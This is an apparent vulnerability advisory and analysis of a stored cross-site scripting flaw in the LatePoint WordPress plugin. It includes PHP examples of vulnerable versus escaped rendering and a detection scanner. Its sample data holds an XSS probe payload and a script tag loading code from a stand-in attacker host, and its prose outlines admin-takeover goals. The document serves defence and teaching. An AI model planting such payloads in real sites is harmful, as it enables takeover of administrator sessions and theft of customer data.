CVE-2026-0617 in LatePoint Plugin
Summary
by MITRE • 02/03/2026
The LatePoint – Calendar Booking Plugin for Appointments and Events plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the customer profile fields in all versions up to, and including, 5.2.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever an administrator views the customer's activity history.
Analysis
by VulDB Data Team • 02/03/2026
CVE-2026-0617 affects the LatePoint plugin for WordPress in all versions up to and including 5.2.5. LatePoint provides appointment and event booking for WordPress sites, which puts the affected code on a public-facing path: a customer's profile data enters through the plugin's front end and is later displayed to staff in the admin area. The flaw is a missing pair of controls around the customer profile fields: input is not sanitized before it is stored, and the stored value is not escaped when the plugin renders it into the administrator's view of the customer's activity history. Because the payload lives in the database and is rendered on every view, this is stored (persistent) cross-site scripting rather than reflected XSS, which would require the victim to follow a crafted link.
Exploitation goes through the customer profile fields the plugin collects, such as first and last name, email address, phone number and other contact details. An attacker places markup or JavaScript in one of these fields; the plugin stores it verbatim, and the admin-side template later concatenates it into HTML without escaping. No authentication is required: the vulnerable fields are reachable by anyone who can reach the plugin's public customer profile interface, so the only prerequisite is a site that exposes LatePoint's front end. The payload then fires when an administrator opens that customer's activity history, that is, in a browser that already holds an authenticated wp-admin session.
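The pattern described above, as an added example rather than LatePoint's own code: a customer-supplied profile field rendered into an admin table row with no escaping, beside the hardened form that escapes for the HTML context at output time and sanitizes at storage time. The field names, the sample record and the helper names are assumptions; the block uses PHP's htmlspecialchars() so it runs without WordPress loaded, and names the WordPress functions (esc_html(), esc_attr(), sanitize_text_field()) that a real plugin would call instead.

```php
<?php
// Added example, not LatePoint's code. Shows the stored-XSS pattern described
// in the analysis: a customer-supplied profile field rendered into an admin
// page without escaping, beside the hardened form. Field names are assumptions.

// Constructed sample record: what an unauthenticated visitor could submit.
// The payload is a harmless probe; a real one would act with the admin session.
$customer = [
    'first_name' => '<img src=x onerror="alert(document.domain)">',
    'last_name'  => 'Doe',
    'email'      => 'doe@example.com',
];

// Vulnerable: concatenates the stored value straight into HTML, so any markup
// in the field becomes live DOM in the administrator's browser.
function render_history_row_vulnerable(array $c): string
{
    return sprintf('<tr><td>%s %s</td><td>%s</td></tr>',
        $c['first_name'], $c['last_name'], $c['email']);
}

// Hardened: escape at the point of output for the context the value lands in.
// htmlspecialchars() is the primitive behind WordPress's esc_html()/esc_attr();
// inside a real plugin call those so behaviour matches WordPress's own.
function esc(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

function render_history_row_safe(array $c): string
{
    return sprintf('<tr><td>%s %s</td><td>%s</td></tr>',
        esc($c['first_name']), esc($c['last_name']), esc($c['email']));
}

// Attribute context: the value must be escaped and the attribute quoted.
function render_email_link_safe(array $c): string
{
    return sprintf('<a href="mailto:%s">%s</a>', esc($c['email']), esc($c['email']));
}

// Defence in depth at storage time (WordPress: sanitize_text_field()).
// Output escaping stays mandatory: data can reach the table by other routes.
function sanitize_profile_field(string $s): string
{
    $s = strip_tags($s);
    $s = preg_replace('/[\x00-\x1F\x7F]/', '', $s);   // drop control characters
    return trim($s);
}

// The vulnerable row carries a live <img ...> element; the safe row carries
// only entity-encoded text that the browser displays verbatim.
echo render_history_row_vulnerable($customer), PHP_EOL;
echo render_history_row_safe($customer), PHP_EOL;
echo render_email_link_safe($customer), PHP_EOL;

// Sanitizing on the way in removes the tag before it is ever saved.
$customer['first_name'] = sanitize_profile_field($customer['first_name']);
echo render_history_row_safe($customer), PHP_EOL;
```

The two renderers differ only in the esc() calls, which is the whole fix for this bug class: escaping is a property of the output context, so it belongs in the template, not in a one-off filter on the way into the database. Storage-time sanitization is worth keeping as a second layer, but on its own it leaves any record that reached the table by an import, an API or an older version of the code still exploitable.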
The impact is that of any XSS in an administrative context: the script runs with the privileges of the administrator's browser session. WordPress sets its authentication cookies HttpOnly, so the usual goal is not to read cookies but to act with the live session: issue authenticated requests from the administrator's browser, read the nonces present in wp-admin pages, create an additional administrator account, install a plugin or edit theme files, any of which yields persistent control of the site. Redirecting the administrator to a credential-phishing page, or exfiltrating the customer data shown in the same view, are simpler variants. Because the payload sits in a customer record, every administrator who reviews that customer's history is a victim, and the data the plugin handles (names, contact details, appointment history) is exactly what a business using it is obliged to protect.
Update LatePoint to a release newer than 5.2.5 that carries the vendor's fix; the corrective change for this class of bug is to sanitize profile input on the way in and, above all, to escape it for the HTML context on the way out. The weakness is CWE-79 (Improper Neutralization of Input During Web Page Generation, "Cross-site Scripting"). In ATT&CK terms the injected payload executes as T1059.007 (Command and Scripting Interpreter: JavaScript) in the administrator's browser; it is not a phishing technique, since the victim is reached through the application's own pages rather than a lure. Beyond patching, a Content Security Policy that forbids inline script would neutralize most payloads of this kind, but wp-admin relies heavily on inline scripts, so such a policy must be tested before it is applied to the admin area. Review stored customer records for injected markup: a payload planted before the update is still in the database, whether it stays live depends on whether the fix escapes on output or only sanitizes new input, and either way a hit is evidence of attempted exploitation. Monitor web server logs for profile submissions containing markup. Multi-factor authentication on administrator accounts limits reuse of credentials phished through the payload, but it does not protect an already-authenticated session that the script rides on, so it complements rather than replaces the update. When a hit is found, treat it as an incident: invalidate administrator sessions, audit users and plugins added since the first suspicious record, and check for modified theme or plugin files.
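The post-update check recommended above, as an added example that is not VulDB's or LatePoint's code: a scan of customer profile fields for markup and script-bearing values, run here over constructed rows. In a real audit the rows would come from the plugin's customer table; the table and column names are not stated on this page and must be taken from the site's own schema, so the field list below is an assumption. The patterns are deliberately broad, since the output is a triage list for a human, and one of the sample rows is a benign false positive to show that.

```php
<?php
// Added example, not LatePoint's or VulDB's code. Scans customer profile
// fields for stored XSS payloads. Rows are constructed; column names are
// assumptions to be checked against the real plugin schema.

$rows = [
    ['id' => 1, 'first_name' => 'Alice', 'last_name' => 'Smith',
     'phone' => '+1 555 0100', 'notes' => ''],
    ['id' => 2, 'first_name' => '<script src="https://attacker.example/a.js"></script>',
     'last_name' => 'Doe', 'phone' => '', 'notes' => ''],
    ['id' => 3, 'first_name' => 'Bob', 'last_name' => "O'Neil",
     'phone' => '+1 555 0101', 'notes' => 'Prefers <b>morning</b> slots'],   // benign, still flagged
    ['id' => 4, 'first_name' => 'Eve', 'last_name' => 'x',
     'phone' => 'javascript:alert(1)', 'notes' => 'click &#x3C;here&#x3E;'],
];

// Indicators that have no business in a name, phone number or free-text note.
// Broad on purpose: a hit means "look at this", not "this is an attack".
const SUSPICIOUS = [
    '/<\s*\/?\s*[a-z][^>]*>/i'   => 'html tag',
    '/\bon[a-z]+\s*=/i'          => 'event handler attribute',
    '/javascript\s*:/i'          => 'javascript: URL',
    '/&#x?[0-9a-f]+;?/i'         => 'numeric entity (possible encoding evasion)',
    '/\\\\u00[0-9a-f]{2}/i'      => 'unicode escape',
];

// Returns the list of indicator labels matched by one stored value.
function scan_value(string $value): array
{
    $hits = [];
    foreach (SUSPICIOUS as $re => $label) {
        if (preg_match($re, $value)) {
            $hits[] = $label;
        }
    }
    return $hits;
}

// Returns one finding per (record, field) pair that matched any indicator.
function scan_rows(array $rows, array $fields): array
{
    $findings = [];
    foreach ($rows as $row) {
        foreach ($fields as $f) {
            $value = (string) ($row[$f] ?? '');
            $hits  = scan_value($value);
            if ($hits) {
                $findings[] = [
                    'id'      => $row['id'],
                    'field'   => $f,
                    'reasons' => $hits,
                    'sample'  => substr($value, 0, 60),
                ];
            }
        }
    }
    return $findings;
}

$fields = ['first_name', 'last_name', 'phone', 'notes'];   // assumed column names
foreach (scan_rows($rows, $fields) as $f) {
    printf("customer %d  %-10s  %-45s  %s\n",
        $f['id'], $f['field'], implode(', ', $f['reasons']), $f['sample']);
}
```

Records 2 and 4 are the ones that matter; record 3 shows why the output is a worklist rather than an alert: a note containing `<b>` is harmless if the template escapes it, and only a person can tell a staff member's formatting habit from an injection attempt. The same scan is worth re-running after the update, because the hits also tell you which administrators viewed a poisoned record and therefore whose sessions to invalidate.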